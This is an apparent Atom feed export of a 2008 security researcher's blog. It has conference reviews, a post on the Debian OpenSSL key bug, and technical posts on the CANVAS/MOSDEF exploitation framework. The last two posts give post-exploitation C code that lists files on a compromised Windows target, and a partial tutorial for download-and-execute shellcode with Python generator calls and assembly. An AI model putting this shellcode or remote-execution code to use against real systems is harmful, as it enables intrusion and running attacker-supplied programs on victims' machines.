width='72'/><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6583006355693901620.post-2771941051511641952</id><published>2008-10-15T16:49:00.000-07:00</published><updated>2008-10-15T17:10:56.608-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' 
term='conference'/><category scheme='http://www.blogger.com/atom/ns#' term='bacon'/><category scheme='http://www.blogger.com/atom/ns#' term='h2hc'/><category scheme='http://www.blogger.com/atom/ns#' term='security'/><category scheme='http://www.blogger.com/atom/ns#' term='ekoparty'/><title type='text'>Ba-Con and EkoParty 2008</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://farm4.static.flickr.com/3246/2944435102_8c140b55dd_b.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px;" src="http://farm4.static.flickr.com/3246/2944435102_8c140b55dd_b.jpg" alt="" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;blockquote&gt;Testing, testing. One, two, three.&lt;br /&gt;Testing, testing. One, two, three.&lt;br /&gt;Maybe this is working. I don't know. If you can even hear me. I don't know.&lt;br /&gt;But if you can hear me, listen.&lt;br /&gt;&lt;/blockquote&gt;&lt;br /&gt;Conference season is over in Buenos Aires and it was a total success. Here is my small review&lt;br /&gt;&lt;br /&gt;dragos &lt;a href="http://www.ba-con.com.ar/"&gt;Ba-Con&lt;/a&gt; was in a really nice hotel in downtown Buenos Aires. If they keep it in the same place next year is gonna be even better, since they are changing the hotel's street into a big sidewalk and thats the Irish Pub's zone.&lt;br /&gt;I went through all the presentations, some of them I already read their ppt before, others were not really of my interest.&lt;br /&gt;&lt;br /&gt;&lt;span style="color:#009900;"&gt;SecViz 2007:&lt;/span&gt; was interesting. Splunk people made a really nice flash animation feed by xml that show information over time. 
If I were a network admin, I would totally use it just to make my work look fancier.&lt;br /&gt;&lt;br /&gt;&lt;span style="color:#009900;"&gt;WPA/WPA2:&lt;/span&gt; It was good, actually the first time I ever went to one of Cedric's talks.&lt;br /&gt;&lt;br /&gt;&lt;span style="color:#009900;"&gt;A Practical Approach to Mitigate and Remove Malware:&lt;/span&gt; It was a really good presentation, not because the material was good but rather because of Ching Tim Meng's skills as a presenter. He can make you laugh over Indonesia's cassava farming policy.&lt;br /&gt;&lt;br /&gt;&lt;span style="color:#009900;"&gt;Pass-the-hash Toolkit for Windows:&lt;/span&gt; The toolkit is pretty good, the research even better, especially if you keep in mind that Hernan did it back in 1992 AD with SoftICE. No symbols, no IDA. For some people it was like reversing with punched cards.&lt;br /&gt;&lt;br /&gt;&lt;span style="color:#009900;"&gt;Hacking PXE without reboot:&lt;/span&gt; I'm glad I finally met Julien. We talked a lot but I had never met the man behind ERESI. The presentation was pretty good, at some point he said "and now we are gonna read assembler" and there was assembler.&lt;br /&gt;&lt;br /&gt;&lt;span style="color:#009900;"&gt;Alex Sotirov's on Browsers:&lt;/span&gt; I did read the slides from their Black Hat presentation, but seeing it live was a jaw breaker. All my respect to Alex and Mark.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.ekoparty.com.ar"&gt;Eko-Party&lt;/a&gt; was amazing. You can see the organizers' hard work on their tired faces. We did two trainings the first day, Pablo gave a condensed version of Unethical Hacking and Dami did the same for Stack Overflow. A bunch of people came to the training, hopefully we are gonna repeat the experience next year.
(I'm glad I didn't put myself into any training/presentation, since I lost my voice on day 1; as Mariano Nuñez said, I sound like the Godfather).&lt;br /&gt;&lt;br /&gt;I didn't go to many presentations since I had meetings and stuff like that. But I got to see the following:&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;1st day:&lt;/span&gt;&lt;br /&gt;&lt;span style="color:#009900;"&gt;Keynote: Dave Aitel &lt;/span&gt; Even though my review won't be fair, I'm just going to say the 90's joke was hilarious.&lt;br /&gt;&lt;span style="color:#009900;"&gt;Pablo Sole's Adobe embedded talk&lt;/span&gt;  First time seeing Pablo talking and he did amazingly well on stage.&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Late Night Talks:&lt;/span&gt; (this was a really nice idea, basically they invited everyone into a bar and people gave 20 minute talks)&lt;br /&gt;&lt;span style="color:#009900;"&gt;Fernando Gont on something related to protocols:&lt;/span&gt; The presentation was too formal and technical (?!) to give it in a bar. I think only 3 people paid attention to his talk, and they were sitting at the same table. Anyways, Fernando either has guts or he doesn't care.
I think the dictionary added a new verb after him:&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;gont&lt;/span&gt;: For the verb "&lt;span style="font-style: italic;"&gt;to gont&lt;/span&gt;"&lt;br /&gt;  Clarify the meaning of and discourse in a learned but boring way to a bunch of drunk hackers&lt;br /&gt;&lt;br /&gt;&lt;span style="color:#009900;"&gt;Andrew Cushman's on the Exploitability Index:&lt;/span&gt; It was a good presentation for the bar and the result can be seen &lt;a href="http://www.microsoft.com/technet/security/bulletin/ms08-oct.mspx"&gt;here&lt;/a&gt;  (apparently they know about our advisory leech script "ms.py", hehe)&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;2nd day&lt;/span&gt;:&lt;br /&gt;&lt;span style="color:#009900;"&gt;Sebastián García - Dime cómo atacas y te diré quién eres:&lt;/span&gt; Profiling attackers by the way they press keys on a shell or make mistakes. I had to leave the presentation in the middle, but apparently at the end he just said "all the things just presented, they don't work anymore these days". Brutally honest, for that last phrase he got my respect.&lt;br /&gt;&lt;span style="color:#009900;"&gt;Luciano Bello - Maximiliano Bertacchini Debian's OpenSSL random number generator Bug:&lt;/span&gt; Great presentation, lots of graphs of keys, computers, Alice and Bob. Although, I think there was a question never asked but I believe everyone wants to hear his answer: "Did you regret publishing the bug?" :).&lt;br /&gt;&lt;span style="color:#009900;"&gt;Nicolas Economou - Alfredo Ortega Smartphones (in)security:&lt;/span&gt; Nice presentation, the climax reached its peak when they hacked their iPhone's abo and SMSed Luciano.&lt;br /&gt;&lt;br /&gt;That's it. Been doing boring work the last week.
If you want to heard the juicy details about this MS Tuesday, check out:&lt;br /&gt;&lt;a href="http://addxorrol.blogspot.com/"&gt;http://addxorrol.blogspot.com/&lt;/a&gt;&lt;br /&gt;&lt;a href="http://blogs.technet.com/swi/default.aspx"&gt;http://blogs.technet.com/swi/default.aspx&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Last but not least, We are gonna be soon in Brazil for the &lt;a href="http://www.h2hc.org.br/"&gt;H2HC&lt;/a&gt;! Pablo would be giving an cool presentation on ID's deplib.py and I will be giving the Keynote called "Apology of 0days". If you are in Sao Paulo the 8/9th of November, Immunity had a booth at the conference and we will be doing the NOP Certification&lt;br /&gt;&lt;br /&gt;Cheers&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6583006355693901620-2771941051511641952?l=eticanicomana.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://eticanicomana.blogspot.com/feeds/2771941051511641952/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6583006355693901620&amp;postID=2771941051511641952' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6583006355693901620/posts/default/2771941051511641952'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6583006355693901620/posts/default/2771941051511641952'/><link rel='alternate' type='text/html' href='http://eticanicomana.blogspot.com/2008/10/ba-con-and-ekoparty-2008.html' title='Ba-Con and EkoParty 2008'/><author><name>Nico Waisman</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_aUReV5sSeqk/SK8WvUJkBdI/AAAAAAAADD4/PGa-HWl7rJw/S220/DSC00333.JPG'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' 
url='http://farm4.static.flickr.com/3246/2944435102_8c140b55dd_t.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6583006355693901620.post-8739127154207900863</id><published>2008-09-27T09:24:00.000-07:00</published><updated>2008-09-27T09:27:13.863-07:00</updated><title type='text'>None</title><content type='html'>If there is someone real that actually read this blog and it happend to be in Buenos Aires next week, I will be attending Ba-Con and the Eko Party with the Immunities. Beer talks are welcome!&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6583006355693901620-8739127154207900863?l=eticanicomana.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://eticanicomana.blogspot.com/feeds/8739127154207900863/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6583006355693901620&amp;postID=8739127154207900863' title='3 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6583006355693901620/posts/default/8739127154207900863'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6583006355693901620/posts/default/8739127154207900863'/><link rel='alternate' type='text/html' href='http://eticanicomana.blogspot.com/2008/09/none.html' title='None'/><author><name>Nico Waisman</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_aUReV5sSeqk/SK8WvUJkBdI/AAAAAAAADD4/PGa-HWl7rJw/S220/DSC00333.JPG'/></author><thr:total>3</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6583006355693901620.post-4278549270270531188</id><published>2008-09-09T14:01:00.000-07:00</published><updated>2008-09-09T14:18:35.793-07:00</updated><category 
scheme='http://www.blogger.com/atom/ns#' term='bugs'/><category scheme='http://www.blogger.com/atom/ns#' term='microsoft tuesday'/><category scheme='http://www.blogger.com/atom/ns#' term='ms08-053'/><category scheme='http://www.blogger.com/atom/ns#' term='activex'/><title type='text'>By the time you read this entry...</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://farm4.static.flickr.com/3197/2828271796_cd7cdc68bc_b.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px;" src="http://farm4.static.flickr.com/3197/2828271796_cd7cdc68bc_b.jpg" alt="" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;...someone on the interweb will be trying to own you with a new MS Tuesday exploit.&lt;br /&gt;There are three bugs which look "interesting" (keeping in mind that we have lowered our standards REALLY low; back in the day everyone was laughing at client-side bugs, myself included). I took the Windows Media Encoder bug (MS08-053) since I spent last week working on slides for the "Auditing ActiveX" section of the "&lt;a href="http://www.immunityinc.com/education-finding0days.shtml"&gt;Finding Bugs with ID&lt;/a&gt;" training that Dami is teaching next week.&lt;br /&gt;Thanks to some scripts we pulled out for the class (all the kudos to Justin) plus OleView, it took &lt;span style="font-weight: bold;"&gt;less than an hour&lt;/span&gt; to find the bug. No bindiff needed this time: the workaround information in the advisory is good enough to get this baby going.&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_aUReV5sSeqk/SMbmYOKXXrI/AAAAAAAADFk/83COV_WVM-I/s1600-h/screenshot9.png"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer;" src="http://4.bp.blogspot.com/_aUReV5sSeqk/SMbmYOKXXrI/AAAAAAAADFk/83COV_WVM-I/s400/screenshot9.png" alt=""
id="BLOGGER_PHOTO_ID_5244132119912341170" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;The next Immunity Debugger release will bring this script, a brand new Python shell based on IPython, and variables.&lt;br /&gt;Those of you attending Dami's class will probably be working on this bug by the end of the day. I won't give away any hint other than that MS08-053 is much easier than the class exercises, so look for the obvious.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6583006355693901620-4278549270270531188?l=eticanicomana.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://eticanicomana.blogspot.com/feeds/4278549270270531188/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6583006355693901620&amp;postID=4278549270270531188' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6583006355693901620/posts/default/4278549270270531188'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6583006355693901620/posts/default/4278549270270531188'/><link rel='alternate' type='text/html' href='http://eticanicomana.blogspot.com/2008/09/by-time-you-read-this-entry.html' title='By the time you read this entry...'/><author><name>Nico Waisman</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_aUReV5sSeqk/SK8WvUJkBdI/AAAAAAAADD4/PGa-HWl7rJw/S220/DSC00333.JPG'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://farm4.static.flickr.com/3197/2828271796_cd7cdc68bc_t.jpg' height='72'
width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6583006355693901620.post-310323444361389793</id><published>2008-09-08T03:34:00.000-07:00</published><updated>2008-09-08T13:33:20.430-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='bugs'/><category scheme='http://www.blogger.com/atom/ns#' term='luciano bello'/><title type='text'>One line to own them all</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://farm4.static.flickr.com/3028/2836409738_c68a363d33_b.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px;" src="http://farm4.static.flickr.com/3028/2836409738_c68a363d33_b.jpg" alt="" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Last Friday I finally met Luciano Bello during the "DSP" (Drunken Security Professionals: like a 2600 meeting, but better).&lt;br /&gt;&lt;br /&gt;For those of you who don't know Luciano, he found the infamous commented-out line in the OpenSSL package of Debian, Ubuntu, etc., which as a consequence generated only 32k distinct keys (per architecture and key size). (The short story: Valgrind complained about the line, a month-long discussion about the line followed, and Debian finally commented it out.)&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family:courier new;font-size:85%;"&gt;/*&lt;br /&gt;* Don’t add uninitialised data.&lt;br /&gt;MD_Update(&amp;amp;m,buf,j);&lt;br /&gt;*/&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;Anyway, I must say that he surprised me in a good way. I thought he would show up in the open-source coat and start fighting us with a Tux in his right hand, trying to save the world or something, but he didn't.&lt;br /&gt;&lt;br /&gt;We had a long talk (most of it laughs); at some point it was more like an interview.
I regret not having a digital recorder (which I will make a point of buying from now on) because I pretty much forgot most of the stuff.&lt;br /&gt;&lt;br /&gt;Being the cryptography researcher he is, when he discovered it he wasn't looking at code as we would; instead he was comparing keys, weekend after weekend comparing keys, until he realised something was not working correctly.&lt;br /&gt;&lt;br /&gt;Something was not working as expected: keys were repeating, about 1 in every 5000. So then he started looking into the code.&lt;br /&gt;&lt;br /&gt;The obligatory question:&lt;br /&gt;You could pretty much own every Debian/Ubuntu box in the world over SSH... which did you pick?&lt;br /&gt;The answer is none. And if you re-ask the question including the word "hypothetical" (he wasn't 100% sure about the bug when he disclosed it), he will again reply: none.&lt;br /&gt;Luciano was so into the bug, testing and checking all his crypto theory, that (and this is my feeling) he never realised the consequences, or what he really *had* in his hands.&lt;br /&gt;He didn't realise SSH was affected until someone from Debian told him and he did the math.&lt;br /&gt;&lt;br /&gt;The conversation took around two hours, and after that I have the feeling (and this is personal) that he is a bit more into the dark side now; maybe not completely, but he took a good peek.&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;&lt;br /&gt;&lt;span style="font-style: italic;font-family:courier new;font-size:78%;"&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://lh6.ggpht.com/lpigner/SMPlFPZaQGI/AAAAAAAAAn8/OhKShIcElFs/s512/DSC02730.JPG"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px;" src="http://lh6.ggpht.com/lpigner/SMPlFPZaQGI/AAAAAAAAAn8/OhKShIcElFs/s512/DSC02730.JPG" alt="" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;From left to right: Luciano Bello, myself and Fran "Rulos Adolescentes"
Amato (evilgrade's coder)&lt;/span&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;Btw, Luciano will be talking at the &lt;a href="http://www.ekoparty.com.ar/"&gt;Eko Party&lt;/a&gt;, as will Pablo Solé and Dave Aitel from Immunity. I'll be around Eko and &lt;a href="http://ba-con.com.ar/"&gt;Ba-Con&lt;/a&gt;; look for the same version of me, but shaved.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:78%;"&gt;Note: Picture taken by Leo from &lt;a href="http://kungfoosion.blogspot.com/"&gt;KungFoosion&lt;/a&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6583006355693901620-310323444361389793?l=eticanicomana.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://eticanicomana.blogspot.com/feeds/310323444361389793/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6583006355693901620&amp;postID=310323444361389793' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6583006355693901620/posts/default/310323444361389793'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6583006355693901620/posts/default/310323444361389793'/><link rel='alternate' type='text/html' href='http://eticanicomana.blogspot.com/2008/09/one-line-to-own-them-all.html' title='One line to own them all'/><author><name>Nico Waisman</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_aUReV5sSeqk/SK8WvUJkBdI/AAAAAAAADD4/PGa-HWl7rJw/S220/DSC00333.JPG'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://farm4.static.flickr.com/3028/2836409738_c68a363d33_t.jpg' height='72'
width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6583006355693901620.post-4272149802013090990</id><published>2008-08-25T19:29:00.000-07:00</published><updated>2008-08-25T20:06:16.887-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='post'/><category scheme='http://www.blogger.com/atom/ns#' term='mosdef'/><category scheme='http://www.blogger.com/atom/ns#' term='file browser'/><category scheme='http://www.blogger.com/atom/ns#' term='explotation'/><category scheme='http://www.blogger.com/atom/ns#' term='shellcode'/><title type='text'>That little thing called MOSDEF</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://farm4.static.flickr.com/3029/2788016210_2824fb46a8_o.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px;" src="http://farm4.static.flickr.com/3029/2788016210_2824fb46a8_o.jpg" alt="" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;In a previous post I gave a small review of the concept behind MOSDEF. I explained that it is a runtime C compiler written in Python that builds shellcode for a bunch of architectures and operating systems, and that it is used in CANVAS as the post-exploitation platform.&lt;br /&gt;&lt;br /&gt;Recently I have been writing a file browser. It's a simple task (especially if you have GUI skills, which I don't) and it has the advantage of showing all the potential that MOSDEF can bring to your framework, even more so if you compare it with an RPC-based one.&lt;br /&gt;&lt;br /&gt;For the file browser, I obviously had to list directories (a feature we luckily already had).
In an RPC environment, you would do something like this:&lt;br /&gt;&lt;br /&gt;&lt;pre style="font-family:courier new;"&gt;hFind = call("kernel32.dll!FindFirstFile", dir, &amp;amp;FindFileData)
print FindFileData.cFileName
while call("kernel32.dll!FindNextFile", hFind, &amp;amp;FindFileData) != 0:
    print FindFileData.cFileName
&lt;/pre&gt;(In a *nix environment you would need two system calls, getdents and stat.)&lt;br /&gt;&lt;br /&gt;It does look nice, but for each file in the directory you pay the latency of the remote call being sent and the result coming back over the wire (think of your target as sitting in the remote forests of Xi'an).&lt;br /&gt;&lt;br /&gt;Now, in the case of MOSDEF, what you need is a small C file that does the same thing as the Python, something like this:&lt;br /&gt;&lt;br /&gt;&lt;pre style="font-family:courier new;"&gt;        vars={}
        vars["dir"]=dir
        code="""
&lt;span style="color: rgb(153, 0, 0);"&gt;#import "string","dir" as "dir"
#import "local","sendstring" as "sendstring"
#import "local","sendint" as "sendint"
#import "remote", "kernel32.dll|FindFirstFileA" as "FindFirstFile"
#import "remote", "kernel32.dll|FindNextFileA" as "FindNextFile"
#import "remote", "kernel32.dll|GetLastError" as "GetLastError"

struct FILETIME {
    int dwLowDateTime;
    int dwHighDateTime;
};

struct WIN32_FIND_DATA {
    int dwFileAttributes;
    struct FILETIME ftCreationTime;
    struct FILETIME ftLastAccessTime;
    struct FILETIME ftLastWriteTime;
    int nFileSizeHigh;
    int nFileSizeLow;
    int dwReserved0;
    int dwReserved1;
    char cFileName[260];
    char cAlternateFileName[14];
};

void sendFILETIME(struct FILETIME *ft) {
    sendint(ft-&gt;dwLowDateTime);
    sendint(ft-&gt;dwHighDateTime);
}

void main() {
    struct WIN32_FIND_DATA FindFileData;
    int hFind;
    int Error;

    hFind = -1;
    hFind = FindFirstFile(dir, &amp;amp;FindFileData);
    if (hFind == -1) {
        // -1 tells the other side there are no more files to send
        sendint(-1);
        Error = GetLastError();
        sendint(Error);
        return 0;
    } else {
        sendint(FindFileData.dwFileAttributes);
        sendint(FindFileData.nFileSizeLow);
        sendFILETIME(&amp;amp;FindFileData.ftLastWriteTime);
        sendstring(FindFileData.cFileName);
    }
    while (FindNextFile(hFind, &amp;amp;FindFileData) != 0) {
        sendint(FindFileData.dwFileAttributes);
        sendint(FindFileData.nFileSizeLow);
        sendFILETIME(&amp;amp;FindFileData.ftLastWriteTime);
        sendstring(FindFileData.cFileName);
    }
    Error = GetLastError();
    sendint(-1);
    sendint(Error); // if it is ERROR_NO_MORE_FILES everything worked ok :&gt;
}
&lt;/span&gt;        """
        self.clearfunctioncache()
        request=self.compile(code, vars)
        self.sendrequest(request)
        countfile=0
        files=[]
        while 1:
            attr = sint32(self.readint())
            [...]
&lt;/pre&gt;Before you mention it, or even think about it: yes, we call it "Cripple C" for a good reason.&lt;br /&gt;Anyway, as you can imagine, this code gets compiled on your computer and the addresses of the functions it needs are resolved remotely.
Here is the normal output you will see:&lt;br /&gt;&lt;br /&gt;&lt;pre style="color: rgb(0, 102, 0);font-family:courier new;"&gt;Dodir: C:\
kernel32.dll|FindFirstFileA not in cache - retrieving remotely.
Getprocaddr_withmalloc: Found kernel32.dll|FindFirstFileA at 7c813559
kernel32.dll|FindNextFileA not in cache - retrieving remotely.
Getprocaddr_withmalloc: Found kernel32.dll|FindNextFileA at 7c839019
kernel32.dll|GetLastError not in cache - retrieving remotely.
Getprocaddr_withmalloc: Found kernel32.dll|GetLastError at 7c910331
&lt;/pre&gt;Once MOSDEF has all the addresses in its cache, it sends the piece of code, which gets executed; after that you just wait for the requested information to come back, parsed and ready to be used in your application.&lt;br /&gt;&lt;br /&gt;Here is the scoop:&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_aUReV5sSeqk/SLNwKf_R0iI/AAAAAAAADEQ/a0ETVVepULQ/s1600-h/filebrowser.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer;" src="http://4.bp.blogspot.com/_aUReV5sSeqk/SLNwKf_R0iI/AAAAAAAADEQ/a0ETVVepULQ/s400/filebrowser.jpg" alt="" id="BLOGGER_PHOTO_ID_5238654117249929762" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:85%;"&gt;Note: Yes, sometimes I do this kind of job.&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1'
src='https://blogger.googleusercontent.com/tracker/6583006355693901620-4272149802013090990?l=eticanicomana.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://eticanicomana.blogspot.com/feeds/4272149802013090990/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6583006355693901620&amp;postID=4272149802013090990' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6583006355693901620/posts/default/4272149802013090990'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6583006355693901620/posts/default/4272149802013090990'/><link rel='alternate' type='text/html' href='http://eticanicomana.blogspot.com/2008/08/that-little-thing-called-mosdef.html' title='That little thing called MOSDEF'/><author><name>Nico Waisman</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_aUReV5sSeqk/SK8WvUJkBdI/AAAAAAAADD4/PGa-HWl7rJw/S220/DSC00333.JPG'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/_aUReV5sSeqk/SLNwKf_R0iI/AAAAAAAADEQ/a0ETVVepULQ/s72-c/filebrowser.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6583006355693901620.post-1026117038431051596</id><published>2008-08-21T18:39:00.000-07:00</published><updated>2008-08-22T04:00:28.211-07:00</updated><title type='text'>Shellcode: You are doing it CORRECT</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://farm4.static.flickr.com/3155/2781994287_9313dfc889_o.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px;" src="http://farm4.static.flickr.com/3155/2781994287_9313dfc889_o.jpg" alt="" border="0" 
/&gt;&lt;/a&gt;&lt;br /&gt;Recently I've been doing a lot of shellcode writing due to some special needs we had for some exploits (check the post "&lt;a href="http://eticanicomana.blogspot.com/2008/08/apology-of-forking-shellcode.html"&gt;Apology of forking shellcodes&lt;/a&gt;").&lt;br /&gt;&lt;br /&gt;One of the things that gets me excited, other than finishing the citrix_metaframe bug, is the redesign of the shellcode framework that Bas did for the last release. The system is pretty simple to use and extend (I added a couple of features myself).&lt;br /&gt;&lt;br /&gt;Instead of explaining the obvious, let me show you how it works with a simple example: a small download-to-IE-cache-and-execute shellcode.&lt;br /&gt;&lt;br /&gt;As most of you know, CANVAS uses MOSDEF, a runtime compiler for a bunch of different operating systems and architectures (Linux x86, Linux SPARC, Linux PPC, Solaris SPARC, Solaris Intel, BSD, AIX, Win32, OSX x86, OSX PPC, etc.). Explaining all the MOSDEF details would take a long time and I usually enjoy my sleep. Let's go with some basics: MOSDEF is a C compiler written in Python, so it has a syntax parser, an intermediate language, an assembler, etc. In this case we are going to use the assembler to compile our shellcode.&lt;br /&gt;&lt;br /&gt;Let's start from the beginning. The main class for shellcoding is basecode:&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family:courier new;"&gt;    def httpcachedownload(self, urlfile):&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family:courier new;"&gt;        codegen = basecode()&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Once we have a basecode object, we need to tell it which Win32 API functions we are going to need. This adds a special stub that resolves each of those functions before our shellcode executes.
(Function resolution is done by walking the PEB, going through the loaded DLLs and comparing the exported names against the wanted one.)&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family:courier new;"&gt;        codegen.find_function("kernel32.dll!loadlibrarya")&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family:courier new;"&gt;        codegen.find_function("kernel32.dll!createprocessa")&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family:courier new;"&gt;        codegen.find_function("kernel32.dll!exitthread")&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Obviously kernel32.dll is always loaded, but there are API functions whose DLL is not always loaded; such is the case of UrlDownloadToCacheFileA in urlmon.dll, which is the function that is going to do all the work for us. So what we need to do at resolving time is LoadLibrary urlmon.dll and then resolve UrlDownloadToCacheFileA. Sounds hard, but it is obviously simple with MOSDEF:&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family:courier new;"&gt;        codegen.load_library('urlmon.dll')&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family:courier new;"&gt;        codegen.find_function("urlmon.dll!urldownloadtocachefilea")&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;With all the function resolution in place, we now want to pass an "argument" to our shellcode. For this particular case we need the URL where our .exe lives, so we add a global string variable named URLNAME and pass our URL in it:&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family:courier new;"&gt;        codegen._globals.addString("URLNAME", urlfile)&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Now we need the actual code.
Yeah, it's a simple framework, but we cannot escape writing the actual assembly:&lt;br /&gt;&lt;br /&gt;&lt;pre style="font-family:courier new;"&gt;        codegen.main = """
&lt;span style="color: rgb(153, 0, 0);"&gt;        xorl %eax, %eax
        mov $0x208, %edx
        //movl %ecx, %edx
        sub %edx, %esp
        movl  %esp, %esi                     // %esi = buffer for szFileName

        leal &lt;b&gt;URLNAME&lt;/b&gt;-getpcloc(%ebp),%edi     // Note how simply we load the
                                             // given argument
        pushl %esi                           // keep the buffer pointer across the call
        // BATCHCODE
        // ------

        pushl %eax                           // pBSC
        pushl %eax                           // dwReserved
        pushl %edx                           // dwBufLength
        pushl %esi                           // szFileName
        pushl %edi                           // URL
        pushl %eax                           // lpUnkCaller
